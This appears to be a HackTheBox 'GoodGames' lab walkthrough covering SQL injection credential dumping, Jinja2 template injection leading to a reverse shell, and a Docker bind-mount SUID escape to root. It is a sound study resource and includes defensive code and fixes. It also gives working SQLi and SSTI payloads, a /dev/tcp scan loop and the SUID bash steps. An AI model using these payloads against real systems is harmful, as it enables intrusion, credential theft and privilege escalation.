We covered HackTheBox GoodGames as part of the CREST CRT track. We went over SQL injection, server-side template injection and Docker privilege escalation.
Initial Reconnaissance and SQL Injection
I started by identifying that the target machine was running a web server on port 80. I discovered a login page and attempted to bypass authentication using SQL injection. I used Burp Suite to intercept the login request and modified the email field with an SQL injection payload. I successfully logged in as the admin.
To dump the database, I used union-based SQL injection. I first found the number of columns in the original query by increasing the column count until the database stopped complaining, with payloads like UNION SELECT 1,2,3 and UNION SELECT 1,2,3,4 (four columns worked). I then found the current database name with UNION SELECT 1,2,3,database(). To list schema names, I used UNION SELECT 1,2,3,group_concat(schema_name) FROM information_schema.schemata. I found the table names with UNION SELECT 1,2,3,group_concat(table_name) FROM information_schema.tables WHERE table_schema='main', where 'main' was the database name I had discovered earlier. I then found the column names of the 'user' table with UNION SELECT 1,2,3,group_concat(column_name) FROM information_schema.columns WHERE table_name='user'. Finally, I dumped the credentials with UNION SELECT 1,2,3,group_concat(id, name, password) FROM user, which gave me an MD5 hash for the admin user. (database(), information_schema and the multi-argument group_concat are MySQL features; the same chain needs different queries against another database engine.)
I used John the Ripper to crack the hash: john --format=raw-md5 hashfile. The cracked password was “super administrator”.
Server-Side Template Injection (SSTI)
After logging in as admin with the cracked password, I found an admin dashboard. I identified that the server was Python-based (Flask was hinted, and an Nmap scan confirmed Python). I tested for SSTI in the full name field on the admin profile page with the payload {{7*7}}. Since it was rendered as 49, SSTI was confirmed: the field's value was being placed into a template and evaluated rather than treated as data.
I then used a Python SSTI payload to confirm the user the application was running as (it was root). Next, I used another Python SSTI payload to get a reverse shell, having started a Netcat listener with nc -lvp 4545 to catch it.
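The page does not show the Python SSTI payloads it used, so the following is an added example and not the original author's code. It assumes the dashboard spliced the full name into a Jinja2 template (the only way {{7*7}} comes back as 49), demonstrates the 7*7 probe, the classic subclasses walk and an os.popen('id') payload that reveals the identity the process runs as, and contrasts that with passing the value as a template variable and with Jinja2's SandboxedEnvironment. It requires the jinja2 package; the "Welcome," template text is made up.

```python
from jinja2 import Environment
from jinja2.exceptions import SecurityError
from jinja2.sandbox import SandboxedEnvironment

# Constructed stand-ins for the dashboard's "full name" handling (assumption:
# the real application is not shown on the page).


def render_vulnerable(full_name, env=None):
    """User input is spliced INTO the template source, so the engine evaluates it."""
    env = env or Environment()
    return env.from_string("Welcome, " + full_name).render()


def render_fixed(full_name, env=None):
    """User input is passed as a VARIABLE; the engine only escapes and prints it."""
    env = env or Environment(autoescape=True)
    return env.from_string("Welcome, {{ full_name }}").render(full_name=full_name)


# The probe from the walkthrough and two classic Python/Jinja2 payloads.
PROBE = "{{7*7}}"
# str -> object -> every loaded class: the usual starting point for RCE gadgets
SUBCLASSES = "{{ ''.__class__.__mro__[1].__subclasses__() | length }}"
# reaches the `os` module through the globals of a Jinja2 built-in, then runs `id`
WHOAMI = "{{ cycler.__init__.__globals__.os.popen('id').read() }}"


def is_injectable(render):
    """SSTI check: does the 7*7 probe come back evaluated?"""
    return "49" in render(PROBE)


def sandbox_blocks(payload):
    """Jinja2's SandboxedEnvironment refuses dunder attribute access."""
    try:
        render_vulnerable(payload, SandboxedEnvironment())
        return False
    except SecurityError:
        return True


if __name__ == "__main__":
    print(render_vulnerable(PROBE))       # Welcome, 49
    print(render_fixed(PROBE))            # Welcome, {{7*7}}
    print(render_vulnerable(SUBCLASSES))  # Welcome, <number of loaded classes>
    print(render_vulnerable(WHOAMI))      # Welcome, uid=...
    print(sandbox_blocks(WHOAMI))         # True
```

The sandbox is a defence in depth, not a fix: the fix is render_fixed, where the attacker controls a value and never the template source.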
Docker Privilege Escalation
The reverse shell landed me in a Docker container as the root user. I stabilized the shell with script /dev/null -c bash, backgrounded it, ran stty raw -echo; fg (followed by Enter), then reset and export TERM=xterm. I noticed a .dockerenv file in /, indicating I was in a Docker container. By checking the mounts with mount | grep austos, I found that the /home/austos directory was bind-mounted from the host machine.
To find the host IP, I performed a ping sweep of the container's Docker network with a for loop: for i in $(seq 1 254); do ping -c 1 172.19.0.$i | grep "bytes from"; done. I then port scanned the identified host IP (the Docker host, 172.19.0.1, the .1 address that Docker gives the host on the bridge) with another loop: for port in $(seq 1 65535); do (echo > /dev/tcp/172.19.0.1/$port) >/dev/null 2>&1 && echo "Port $port is open"; done. This revealed that ports 22 (SSH) and 80 were open. Note that /dev/tcp is a bash feature rather than a real device file, so the loop needs bash rather than sh, and since each connect has no timeout, filtered ports can make a full 65535-port sweep slow.
I SSHed to the Docker host with ssh austos@172.19.0.1, using the previously cracked password “super administrator” (the same password was reused for the web application and the host account).
For privilege escalation, I used the fact that /home/austos was shared between the host and the container, where I was root. From the SSH session on the host, I had first copied the /bin/bash binary into the mounted /home/austos directory. From within the Docker container, I changed the ownership of the copied bash binary to root with chown root:root bash, then set the SUID bit with chmod u+s bash. Because the container's root is the host's uid 0 (no user namespace remapping) and the bind mount shares the same underlying files, both changes were visible on the host. Back on the Docker host (in the SSH session), I executed the SUID bash binary from the mounted directory with ./bash -p. The -p flag is crucial: without it, bash sees that its effective uid (root) differs from its real uid (austos) and resets the effective uid to the real one, leaving a plain austos shell. With -p it keeps the root effective uid, which gave me a root shell on the host machine.
Finally, I confirmed root access with id, navigated to /root with cd /root, and found the flag with ls.
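The two conditions this escalation depends on can be checked rather than assumed, so here is an added example that is not part of the walkthrough. It parses a container's /proc/self/uid_map to see whether container root is host root, parses the host's /proc/self/mountinfo to see whether the filesystem backing the shared directory carries nosuid (the host runs ./bash -p through its own mount, so that is the mount whose options matter), and audits a directory for setuid files. All sample file contents are constructed; the user name austos and the mount paths are taken from the writeup, and the host's /home device and options are assumptions.

```python
import os
import stat
import tempfile

# Constructed samples; the page shows neither file, so both are assumptions.
# /proc/self/uid_map as read inside a container: a default Docker daemon maps
# container uid 0 straight to host uid 0, a userns-remapped daemon does not.
UID_MAP_DEFAULT = "         0          0 4294967295\n"
UID_MAP_REMAPPED = "         0     100000      65536\n"
# /proc/self/mountinfo as read on the HOST, for the filesystem behind the
# shared /home/austos. Fields: id parent major:minor root mountpoint options ...
HOST_MOUNTINFO_WEAK = "30 1 8:2 / /home rw,relatime shared:1 - ext4 /dev/sda2 rw\n"
HOST_MOUNTINFO_NOSUID = "30 1 8:2 / /home rw,nosuid,nodev,relatime shared:1 - ext4 /dev/sda2 rw\n"


def container_root_is_host_root(uid_map):
    """True when uid_map maps container uid 0 onto host uid 0 (no userns remap)."""
    for line in uid_map.splitlines():
        inside, outside, count = (int(x) for x in line.split())
        if inside <= 0 < inside + count:
            return outside - inside == 0
    return False


def mount_options(mountinfo, mount_point):
    """Per-mount option set of the mount at `mount_point`, parsed from mountinfo text."""
    for line in mountinfo.splitlines():
        fields = line.split()
        if len(fields) > 5 and fields[4] == mount_point:
            return set(fields[5].split(","))
    return None


def suid_files(directory, owner_uid=0):
    """Regular files in `directory` owned by `owner_uid` that carry the setuid bit."""
    hits = []
    for entry in os.scandir(directory):
        st = entry.stat(follow_symlinks=False)
        if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID and st.st_uid == owner_uid:
            hits.append(entry.name)
    return sorted(hits)


def suid_escape_possible(uid_map, host_mountinfo, host_mount_point):
    """Both conditions the walkthrough relied on: container root is host root,
    and the host mount the binary is executed from does not carry nosuid."""
    opts = mount_options(host_mountinfo, host_mount_point)
    return container_root_is_host_root(uid_map) and opts is not None and "nosuid" not in opts


def plant_suid(directory, name="bash"):
    """The chmod u+s step from the walkthrough, on a placeholder file
    (no chown root:root here: that part needs root)."""
    path = os.path.join(directory, name)
    with open(path, "wb") as f:
        f.write(b"#!/bin/sh\n")  # placeholder, not a real shell binary
    os.chmod(path, 0o4755)
    return path


def demo_audit():
    """Plant a setuid file in a fresh temp directory and show the audit finding it."""
    workdir = tempfile.mkdtemp()
    plant_suid(workdir)
    return suid_files(workdir, owner_uid=os.getuid())


if __name__ == "__main__":
    print("default daemon, plain /home:", suid_escape_possible(UID_MAP_DEFAULT, HOST_MOUNTINFO_WEAK, "/home"))
    print("default daemon, nosuid /home:", suid_escape_possible(UID_MAP_DEFAULT, HOST_MOUNTINFO_NOSUID, "/home"))
    print("remapped daemon, plain /home:", suid_escape_possible(UID_MAP_REMAPPED, HOST_MOUNTINFO_WEAK, "/home"))
    print("audit finds:", demo_audit())
```

If either condition fails the trick fails: under userns-remap the container's chown root:root produces a file owned by a high host uid rather than root, and on a nosuid filesystem the host kernel ignores the setuid bit at exec time. Putting nosuid only on the container-side bind mount does not help, because the host executes the binary through its own mount; the simplest fix is not to share a writable host directory with a container that runs as root at all.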
Technical Commands
Here are the technical commands I used:
john --format=raw-md5 hashfile
nc -lvp 4545
script /dev/null -c bash
stty raw -echo; fg
reset
export TERM=xterm
mount | grep austos
for i in $(seq 1 254); do ping -c 1 172.19.0.$i | grep "bytes from"; done
for port in $(seq 1 65535); do (echo > /dev/tcp/172.19.0.1/$port) >/dev/null 2>&1 && echo "Port $port is open"; done
ssh austos@172.19.0.1
chown root:root bash
chmod u+s bash
./bash -p
id
cd /root
ls